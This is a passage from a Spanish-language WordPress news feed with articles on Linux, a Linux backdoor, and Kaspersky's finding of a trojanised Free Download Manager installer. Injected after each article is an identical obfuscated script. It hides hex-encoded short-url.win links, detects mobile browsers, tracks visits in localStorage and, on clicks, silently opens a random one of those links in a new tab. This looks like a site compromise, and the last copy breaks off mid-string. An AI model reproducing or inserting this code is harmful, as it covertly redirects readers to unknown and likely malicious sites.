Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/descubierto-backdoor-en-linux-tu-empresa-esta-en-riesgo/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98747</post-id>	</item>
		<item>
		<title>¿Qué es Linux y quiénes lo usan?</title>
		<link>https://www.todoenunclick.com/que-es-linux-y-quienes-lo-usan/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 29 Jan 2024 16:51:46 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[GNU]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[RedHat]]></category>
		<category><![CDATA[sistema operativo]]></category>
		<category><![CDATA[software libre]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=98409</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/01/Que-es-Linux-y-quienes-lo-usan.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="¿Qué es Linux y quiénes lo usan?" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Que-es-Linux-y-quienes-lo-usan.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Que-es-Linux-y-quienes-lo-usan.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Que-es-Linux-y-quienes-lo-usan.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Que-es-Linux-y-quienes-lo-usan.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Que-es-Linux-y-quienes-lo-usan.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Que-es-Linux-y-quienes-lo-usan.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/01/Que-es-Linux-y-quienes-lo-usan.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>En el vasto paisaje de la tecnología, Linux ha emergido como una fuerza disruptiva y revolucionaria. Muchas veces mencionado y citado como un nuevo sistema que surgió como novedad en materia de open source, accesible y sin costos, Linux es, en resumen, un sistema operativo. Esto significa que es el marco sobre el que corren los programas, servicios y aplicaciones que permiten a nuestros ordenadores y dispositivos realizar cualquier tarea. Creado por Linus Torvalds en 1991, no solo representa una alternativa a los sistemas comerciales tradicionales, sino que encarna una filosofía única: el código abierto.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Sin un software que les indique a las computadoras cómo funcionar, estas no son más que cajas de silicio, cobre, litio y plástico. Los programas son instrucciones que explican cómo funcionar y desarrollar tareas, pero para que estos siquiera corran hace falta un marco estandarizado que indique cuáles son las partes relevantes en cada momento, de dónde se toman los datos, y más. Esta parte de “fondo” la gestionan los sistemas operativos como Windows, macOS, y la alternativa de código abierto Linux, que es una de las más especializada y elegida para el uso empresarial.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El corazón de Linux late al ritmo del código abierto, un concepto que se fundamenta en la transparencia, la colaboración comunitaria y la libertad. En contraste con los sistemas operativos propietarios, el código abierto permite que el código fuente de un software esté disponible para su inspección, modificación y distribución por parte de cualquier persona. Esto permite que la comunidad se autorregule y pueda gestionar sus necesidades de seguridad y rendimiento con ideales como hacer que funcione en la mayor cantidad de infraestructura posible o optimizar el rendimiento.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Linus Torvalds concibió Linux con la idea de crear un sistema operativo que no sólo fuera accesible para todos, sino que también permitiera a los usuarios y desarrolladores contribuir y mejorar continuamente su funcionamiento. Así nació una comunidad global de programadores apasionados que moldean el crecimiento y la evolución de este sistema desde sus inicios.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La esencia del código abierto impregna cada fibra de Linux. Su robustez, seguridad y flexibilidad son el resultado directo de esta filosofía colaborativa. Además de ser un sistema operativo establecido en computadoras personales, servidores y dispositivos móviles, Linux también se ha extendido a dominios menos convencionales, como la infraestructura de la nube y la Internet de las cosas (IoT). Incluso, mucha de la tecnología que le da poder a los servidores en la nube y almacenan las aplicaciones o datos de los servicios que usamos todos los días emplean Linux de fondo para optimizar rendimiento y seguridad.&nbsp;</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>"El código abierto, como lo encarna Linux, ofrece a las empresas una ventana a un ecosistema colaborativo donde la adaptabilidad y la personalización son pilares fundamentales. Esta transparencia y flexibilidad permiten tomar las riendas de su tecnología y adaptarlas a sus necesidades específicas para crear experiencias más personalizadas y optimizables," comenta Jorge Payró, Country Manager de Red Hat para Argentina.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Linux, un testimonio vivo del poder del código abierto, continúa desafiando las convenciones y estableciendo nuevos estándares en la industria tecnológica. Su presencia diversificada y su constante evolución no sólo da forma a los sistemas informáticos modernos, sino que también inspiró una nueva forma de concebir y desarrollar software en un mundo cada vez más interconectado y colaborativo.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/que-es-linux-y-quienes-lo-usan/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98409</post-id>	</item>
		<item>
		<title>Oculto a plena vista: Kaspersky descubre un presunto ataque a la cadena de suministro dirigido a Linux</title>
		<link>https://www.todoenunclick.com/oculto-a-plena-vista-kaspersky-descubre-un-presunto-ataque-a-la-cadena-de-suministro-dirigido-a-linux/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Wed, 20 Sep 2023 17:03:27 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[ataque]]></category>
		<category><![CDATA[Free Download Manager]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[linux]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=4800</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2023/09/Linux_.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/09/Linux_.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/09/Linux_.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/09/Linux_.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/09/Linux_.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/09/Linux_.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/09/Linux_.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2023/09/Linux_.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>Kaspersky descubrió una campaña maliciosa en la que se empleó un instalador del software <em>Free Download Manager</em> para difundir una puerta trasera de Linux durante un mínimo de tres años. Los investigadores descubrieron que las víctimas se infectaron al descargar el software del sitio web oficial, lo que indica que se trata de un posible ataque a la cadena de suministro. Las variantes del malware utilizado en esta campaña se identificaron por primera vez en 2013. Las víctimas están ubicadas en varios países, entre ellos, Brasil, China, Arabia Saudita y Rusia.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los expertos de Kaspersky identificaron que en esta campaña los agentes de amenazas implementaron un tipo de troyano en los dispositivos de las víctimas utilizando una versión infectada del popular software gratuito <em>Free Download Manager</em>. Una vez infectados, el objetivo de los atacantes es robar información como detalles sobre el sistema, historial de navegación, contraseñas guardadas, archivos de billeteras de criptomonedas e incluso, credenciales para servicios en la nube, como Amazon Web Services o Google Cloud.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los investigadores creen que es probable que se trate de un ataque a la cadena de suministro. Durante la investigación sobre las guías de instalación de <em>Free Download Manager</em> en YouTube para computadoras Linux, encontraron ejemplos en los que los creadores de vídeos mostraron, sin darse cuenta, el proceso de infección inicial: al hacer clic en el botón de descarga en el sitio web oficial, se instalaba una versión maliciosa de <em>Free Download Manager</em>. Por el contrario, en otro video se descargó una versión legítima del software. Es posible que los programadores de malware hayan escrito la redirección maliciosa de manera que aparezca con cierto grado de probabilidad o basándose en la huella digital de la víctima potencial. Como resultado, algunos usuarios encontraron un paquete malicioso, mientras que otros obtuvieron uno limpio.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>De acuerdo con los hallazgos de Kaspersky, la campaña duró por lo menos tres años, desde 2020 a 2022. El paquete malicioso instaló la versión <em>Free Download Manager</em> presentada en 2020. Además, durante este período, hubo conversaciones en sitios web como StackOverflow y Reddit acerca de los problemas causados por la distribución del software infectado. Sin embargo, los usuarios no sabían que estos problemas eran causados por una actividad maliciosa.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"align":"center","id":4801,"sizeSlug":"full","linkDestination":"none","tdShowModal":true} -->
<div><a href="https://www.todoenunclick.com/wp-content/uploads/2023/09/Linux_2.jpg" class="td-modal-image"><figure class="wp-block-image aligncenter size-full"><img src="https://www.todoenunclick.com/wp-content/uploads/2023/09/Linux_2.jpg" alt="Un usuario de Reddit llegó a preguntarse si podría instalar Free Download Manager

sin necesidad de ejecutar un script, que resultó contener el malware." class="wp-image-4801"/></figure></a></div>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p><em>“Las soluciones de Kaspersky para Linux han logrado detectar variantes de la puerta trasera analizada desde 2013. Sin embargo, existe una idea errónea generalizada de que Linux es inmune al malware, lo que deja a muchos de estos sistemas sin una protección de ciberseguridad adecuada. Esa falta de protección hace que estos sistemas sean objetivos atractivos para los ciberdelincuentes. Esencialmente, el caso de Free Download Manager demuestra el reto que es detectar a simple vista un ciberataque en curso a un sistema Linux. Por lo tanto, es esencial que las computadoras basadas en Linux, tanto de escritorio como de servidor, implementen medidas de seguridad confiables y efectivas”,</em> dice <strong>Georgy Kucherin, experto en seguridad del Equipo Global de Investigación y Análisis (GReAT) de Kaspersky</strong>.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para evitar amenazas basadas en Linux y de otro tipo, conviene implementar las siguientes medidas de seguridad:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><!-- wp:list-item -->
<li>Proteger los <em>endpoints</em> con una solución de seguridad como <a href="https://latam.kaspersky.com/enterprise-security/endpoint">Kaspersky Endpoint Security for Business</a>, que esté equipada con detección basada en comportamiento y capacidades de control de anomalías para una protección efectiva contra amenazas conocidas y desconocidas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Utilizar <a href="https://latam.kaspersky.com/enterprise-security/embedded-systems">Kaspersky Embedded Systems Security</a>. Esta solución adaptable de varias capas proporciona seguridad optimizada para sistemas, dispositivos y escenarios integrados basados en Linux, de conformidad con los rigurosos estándares reglamentados que a menudo se aplican a estos sistemas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Dado que las credenciales robadas pueden ponerse a la venta en la <em>darkweb</em>, utilizar <a href="https://content.kaspersky-labs.com/se/media/en/business-security/enterprise/kaspersky-digital-footprint-intelligence-datasheet.pdf">Kaspersky Digital Footprint Intelligence</a> servirá para monitorear los recursos ocultos e identificar rápidamente las amenazas relacionadas.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>El análisis técnico de la campaña está disponible en <a href="https://securelist.com/backdoored-free-download-manager-linux-malware/110465/">Securelist</a>.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v 